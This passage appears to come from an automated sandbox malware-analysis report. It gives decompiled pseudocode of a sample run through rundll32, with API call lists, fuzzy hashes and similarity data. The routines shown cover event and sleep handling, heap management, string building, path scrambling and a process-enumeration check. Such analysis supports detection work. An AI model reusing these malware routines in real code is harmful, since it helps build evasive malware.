					}
					goto L3;
					L11:
					_t42 = E05471C47( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                  0x0547a0b2
                                                  0x0547a0b2
                                                  0x0547a0bc
                                                  0x0547a0c2
                                                  0x0547a0c5
                                                  0x0547a0c9
                                                  0x0547a0d1
                                                  0x0547a0d4
                                                  0x0547a0ed
                                                  0x0547a0f0
                                                  0x0547a0f4
                                                  0x0547a0f8
                                                  0x0547a0f9
                                                  0x0547a0fe
                                                  0x0547a101
                                                  0x0547a108
                                                  0x0547a10f
                                                  0x0547a162
                                                  0x0547a16b
                                                  0x0547a16e
                                                  0x0547a1a9
                                                  0x0547a1af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0547a16e
                                                  0x0547a115
                                                  0x00000000
                                                  0x0547a11c
                                                  0x0547a12a
                                                  0x0547a12d
                                                  0x0547a130
                                                  0x0547a13c
                                                  0x0547a140
                                                  0x0547a1a2
                                                  0x0547a142
                                                  0x0547a145
                                                  0x0547a149
                                                  0x0547a14a
                                                  0x0547a14b
                                                  0x0547a14d
                                                  0x0547a154
                                                  0x0547a192
                                                  0x0547a19d
                                                  0x0547a156
                                                  0x0547a159
                                                  0x0547a15d
                                                  0x0547a15d
                                                  0x0547a154
                                                  0x00000000
                                                  0x0547a140
                                                  0x0547a115
                                                  0x0547a0d9
                                                  0x0547a0df
                                                  0x0547a0e4
                                                  0x0547a0e7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0547a177
                                                  0x0547a17f
                                                  0x0547a186
                                                  0x0547a186
                                                  0x00000000

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 0547A0C9
                                                  • SetEvent.KERNEL32(?), ref: 0547A0D9
                                                  • GetLastError.KERNEL32 ref: 0547A162
                                                    • Part of subcall function 05471C47: WaitForMultipleObjects.KERNEL32(00000002,0547AA72,00000000,0547AA72,?,?,?,0547AA72,0000EA60), ref: 05471C62
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  • GetLastError.KERNEL32(00000000), ref: 0547A197
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: 0d3a098cd01153e78df70538a6fa78509ab8245347167cce4ae8b0248cd01fdc
                                                  • Instruction ID: 182ca6e4eee8a54477c72ba7cc88193bb959dc637cef5d790fa96ba9f01fdec9
                                                  • Opcode Fuzzy Hash: 0d3a098cd01153e78df70538a6fa78509ab8245347167cce4ae8b0248cd01fdc
                                                  • Instruction Fuzzy Hash: B931EDB590024CEFEB21DFD6CC849EEBBB9FB04240F5049ABE542E2240D7709A459F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05473BF1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 40%
                                                  			E05473BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E05479763(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E0547A022(_t23);
						}
					}
					return _t38;
				}
				if(E0547A72D(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x547d2a8, 1, 0,  *0x547d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E05478A51(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E054717D5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E05471F99(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E054742EA( &_v32, _t39);
					goto L13;
				}
			}












                                                  0x05473bf1
                                                  0x05473bfe
                                                  0x05473c04
                                                  0x05473c05
                                                  0x05473c06
                                                  0x05473c07
                                                  0x05473c08
                                                  0x05473c0c
                                                  0x05473c18
                                                  0x05473c1c
                                                  0x05473ca4
                                                  0x05473ca4
                                                  0x05473ca7
                                                  0x05473ca9
                                                  0x05473cb1
                                                  0x05473cb1
                                                  0x05473cb7
                                                  0x05473cba
                                                  0x05473cba
                                                  0x05473cb7
                                                  0x05473cc5
                                                  0x05473cc5
                                                  0x05473c2f
                                                  0x05473c31
                                                  0x05473c31
                                                  0x05473c48
                                                  0x05473c4c
                                                  0x05473c4f
                                                  0x05473c5a
                                                  0x05473c61
                                                  0x05473c61
                                                  0x05473c6d
                                                  0x05473c6e
                                                  0x05473c7c
                                                  0x05473c70
                                                  0x05473c70
                                                  0x05473c71
                                                  0x05473c72
                                                  0x05473c73
                                                  0x05473c74
                                                  0x05473c75
                                                  0x05473c75
                                                  0x05473c81
                                                  0x05473c86
                                                  0x05473c88
                                                  0x05473c8a
                                                  0x05473c8a
                                                  0x05473c91
                                                  0x00000000
                                                  0x05473c93
                                                  0x05473c93
                                                  0x05473ca0
                                                  0x00000000
                                                  0x05473ca0

                                                  APIs
                                                  • CreateEventA.KERNEL32(0547D2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,05476880,?,00000001,?), ref: 05473C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,05476880,?,00000001,?,00000002,?,?,05472417,?), ref: 05473C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,05476880,?,00000001,?,00000002,?,?,05472417,?), ref: 05473C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,05476880,?,00000001,?,00000002,?,?,05472417,?), ref: 05473C61
                                                    • Part of subcall function 05478A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,05473C81,?,05473C81,?,?,?,?,?,05473C81,?), ref: 05478B2B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: 4828f60ac09d3fa592c8e67a554fc843175617d93139446ae92916009a990853
                                                  • Instruction ID: 9393f8daaf908346a18664b3a30285e48bf35864d89360df2efecbc41ff7ff5f
                                                  • Opcode Fuzzy Hash: 4828f60ac09d3fa592c8e67a554fc843175617d93139446ae92916009a990853
                                                  • Instruction Fuzzy Hash: 04216573D0021DAFCB20AFE588898EFB77DBF44250B15486BEA11E7240DB74D945DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05471A70, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E05471A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E05472049(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                  0x05471a7c
                                                  0x05471a80
                                                  0x05471a81
                                                  0x05471a82
                                                  0x05471a84
                                                  0x05471a86
                                                  0x05471a8b
                                                  0x05471a8e
                                                  0x05471b25
                                                  0x05471b2c
                                                  0x05471b2c
                                                  0x05471a97
                                                  0x05471a9e
                                                  0x05471aae
                                                  0x05471aae
                                                  0x05471ab4
                                                  0x05471ab6
                                                  0x05471abb
                                                  0x05471ac4
                                                  0x05471acc
                                                  0x05471acf
                                                  0x05471ada
                                                  0x05471ade
                                                  0x05471ae0
                                                  0x05471ae1
                                                  0x05471aea
                                                  0x05471aee
                                                  0x05471aff
                                                  0x05471af0
                                                  0x05471af5
                                                  0x05471afa
                                                  0x05471b09
                                                  0x05471b09
                                                  0x05471ade
                                                  0x05471b0f
                                                  0x05471b15
                                                  0x05471b15
                                                  0x05471b1e
                                                  0x05471b23
                                                  0x05471b23
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: 2c15ac84e6b5ef2c367ae0016327b6b47e53e403ba0b96dafa722bb76af68af1
                                                  • Instruction ID: 5454e0fdb14c2fc55a4d89dadb325e4e460c00bc6c94b50d74dadc22af0b59e1
                                                  • Opcode Fuzzy Hash: 2c15ac84e6b5ef2c367ae0016327b6b47e53e403ba0b96dafa722bb76af68af1
                                                  • Instruction Fuzzy Hash: 08211075A0020DEFCB11DFA9D988DDEBBB9FF49211B1041AAE906E7210EB70DA45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547788B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E0547788B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x547d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x547d250; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x547d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                  0x05477893
                                                  0x05477896
                                                  0x0547789c
                                                  0x054778b4
                                                  0x054778b8
                                                  0x054778bb
                                                  0x054778bd
                                                  0x054778c0
                                                  0x054778c2
                                                  0x054778c5
                                                  0x054778c7
                                                  0x054778c7
                                                  0x054778c9
                                                  0x054778d4
                                                  0x054778d9
                                                  0x054778ea
                                                  0x054778f2
                                                  0x054778f7
                                                  0x054778fa
                                                  0x054778fd
                                                  0x054778ff
                                                  0x05477905
                                                  0x05477908
                                                  0x05477908
                                                  0x05477908
                                                  0x05477913
                                                  0x05477918
                                                  0x05477922

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0547839A,00000000,?,?,0547A428,?,073E95B0), ref: 05477896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 054778AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0547839A,00000000,?,?,0547A428,?,073E95B0), ref: 054778F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 05477913
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: 868bd68254280a06d63f56ee110d6a20adb12fe0cf0e5bc68b0424ac5ef367ef
                                                  • Instruction ID: b682affff40d2c9bd9f91a44b835b7b7bd8c05002103ffb9220eeea673b8d3c3
                                                  • Opcode Fuzzy Hash: 868bd68254280a06d63f56ee110d6a20adb12fe0cf0e5bc68b0424ac5ef367ef
                                                  • Instruction Fuzzy Hash: B111C672E10118AFD7148A6ADC89EDEBFAAEF85260B0501A6F505DB240EA709E05C7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05477A9A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E05477A9A(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E05476B43(_t8, _t1);
				_t16 = E05472049(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E054786D8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E05472049(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E05479039(_t16);
				}
				return _t18;
			}









                                                  0x05477aa5
                                                  0x05477aa6
                                                  0x05477aa9
                                                  0x05477aab
                                                  0x05477ab6
                                                  0x05477aba
                                                  0x05477abf
                                                  0x05477ac3
                                                  0x05477acb
                                                  0x05477ad0
                                                  0x05477ad8
                                                  0x05477ad8
                                                  0x05477ae1
                                                  0x05477ae5
                                                  0x05477aeb
                                                  0x05477aee
                                                  0x05477af4
                                                  0x05477af4
                                                  0x05477afc
                                                  0x05477afc
                                                  0x05477b03
                                                  0x05477b03
                                                  0x05477b0e

                                                  APIs
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                    • Part of subcall function 054786D8: wsprintfA.USER32 ref: 05478734
                                                  • lstrlen.KERNEL32(054723E9,00000000,00000000,00000027,00000005,00000000,00000000,054796DA,74666F53,00000000,054723E9,0547D00C,?,054723E9), ref: 05477AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 05477AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 05477AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: ac7fbfcd8202c82a6d7b8445557e2cfe626af541282c4d4e3ff0aeccf00413b2
                                                  • Instruction ID: 62ccba8ed1bcca0a637ed3ce256f296f3d0420257fbb003648705ae57616395f
                                                  • Opcode Fuzzy Hash: ac7fbfcd8202c82a6d7b8445557e2cfe626af541282c4d4e3ff0aeccf00413b2
                                                  • Instruction Fuzzy Hash: A601A23220065DB7CB12AAA6DC8CEEF7F69EF85245F04442BFA0655101EB758A45C7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547757F, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E0547757F() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x547d27c; // 0x1f6a5a8
						_t2 = _t9 + 0x547ee54; // 0x73617661
						_push( &_v264);
						if( *0x547d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                  0x0547758a
                                                  0x05477594
                                                  0x05477598
                                                  0x054775a2
                                                  0x054775d3
                                                  0x054775a9
                                                  0x054775ae
                                                  0x054775bb
                                                  0x054775c4
                                                  0x054775db
                                                  0x054775c6
                                                  0x054775ce
                                                  0x00000000
                                                  0x054775ce
                                                  0x054775dc
                                                  0x054775dd
                                                  0x00000000
                                                  0x054775dd
                                                  0x00000000
                                                  0x054775d7
                                                  0x054775e3
                                                  0x054775e8

                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0547758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 054775A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 054775CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 054775DD
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 5badaaa88e25c5be01d2230f1b6959e968b1819c3f886f3fbf7ca5656e3916fb
                                                  • Instruction ID: 8e1999aad567eb9d13987f17bf8f5fac967a5e1cb4b3b69095b02e47a968231e
                                                  • Opcode Fuzzy Hash: 5badaaa88e25c5be01d2230f1b6959e968b1819c3f886f3fbf7ca5656e3916fb
                                                  • Instruction Fuzzy Hash: B2F0B47260512D6BDB20A7769C8DEFB3BADEFC5610F4040A3F916D2100EF24CD5A8AE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05477C61, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E05477C61(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                  0x05477c6b
                                                  0x05477c6f
                                                  0x05477c84
                                                  0x05477c88
                                                  0x05477c8b
                                                  0x05477c91
                                                  0x05477c95
                                                  0x05477c98
                                                  0x05477ca3
                                                  0x05477c9a
                                                  0x05477c9a
                                                  0x05477c9a
                                                  0x05477c98
                                                  0x05477cb1

                                                  APIs
                                                  • memset.NTDLL ref: 05477C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 05477C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 05477C91
                                                  • CloseHandle.KERNEL32(?), ref: 05477CA3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: b4da27aea7403e40b146d3fa30a5cdc6f39028290263085b42b1e98152163fea
                                                  • Instruction ID: fe6296e86b15f3193dbcfc91f3750a68257278de66a3a2598d81b395652e8def
                                                  • Opcode Fuzzy Hash: b4da27aea7403e40b146d3fa30a5cdc6f39028290263085b42b1e98152163fea
                                                  • Instruction Fuzzy Hash: A1F0F4B510430CBFD3205F66DCC5CB7BFACFB451D9B52456EF04691541DA32E8098AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547970F, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0547970F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x547d26c; // 0x31c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x547d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x547d26c; // 0x31c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x547d238; // 0x6ff0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                  0x0547970f
                                                  0x05479716
                                                  0x05479760
                                                  0x05479762
                                                  0x05479762
                                                  0x0547971a
                                                  0x05479720
                                                  0x05479725
                                                  0x05479729
                                                  0x0547972f
                                                  0x05479736
                                                  0x00000000
                                                  0x00000000
                                                  0x05479738
                                                  0x0547973d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0547973d
                                                  0x0547973f
                                                  0x05479747
                                                  0x0547974a
                                                  0x0547974a
                                                  0x05479750
                                                  0x05479757
                                                  0x0547975a
                                                  0x0547975a
                                                  0x00000000

                                                  APIs
                                                  • SetEvent.KERNEL32(0000031C,00000001,05478099), ref: 0547971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 05479729
                                                  • CloseHandle.KERNEL32(0000031C), ref: 0547974A
                                                  • HeapDestroy.KERNEL32(06FF0000), ref: 0547975A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: 77795021a560ccd2124ab0fe2754366b0648642da34a8dad7aeede921114cb4e
                                                  • Instruction ID: ce02a87748452685a220cdd09953115e4773e46f9728ccd26608c16dfd4cf172
                                                  • Opcode Fuzzy Hash: 77795021a560ccd2124ab0fe2754366b0648642da34a8dad7aeede921114cb4e
                                                  • Instruction Fuzzy Hash: F2F03035B3935C9BD7286FB5A98EBC73FA8BF00651B040691B805E7380DF24D840DA90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 054775E9, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E054775E9(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x547d32c; // 0x73e95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x547d32c; // 0x73e95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x547d030) {
					HeapFree( *0x547d238, 0, _t8);
				}
				_t14[1] = E054794A9(_v0, _t14);
				_t11 =  *0x547d32c; // 0x73e95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                  0x054775e9
                                                  0x054775e9
                                                  0x054775f2
                                                  0x05477602
                                                  0x05477602
                                                  0x05477607
                                                  0x0547760c
                                                  0x00000000
                                                  0x00000000
                                                  0x054775fc
                                                  0x054775fc
                                                  0x0547760e
                                                  0x05477612
                                                  0x05477624
                                                  0x05477624
                                                  0x05477634
                                                  0x05477637
                                                  0x0547763c
                                                  0x05477640
                                                  0x05477646

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(073E9570), ref: 054775F2
                                                  • Sleep.KERNEL32(0000000A,?,054723DE), ref: 054775FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,054723DE), ref: 05477624
                                                  • RtlLeaveCriticalSection.NTDLL(073E9570), ref: 05477640
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
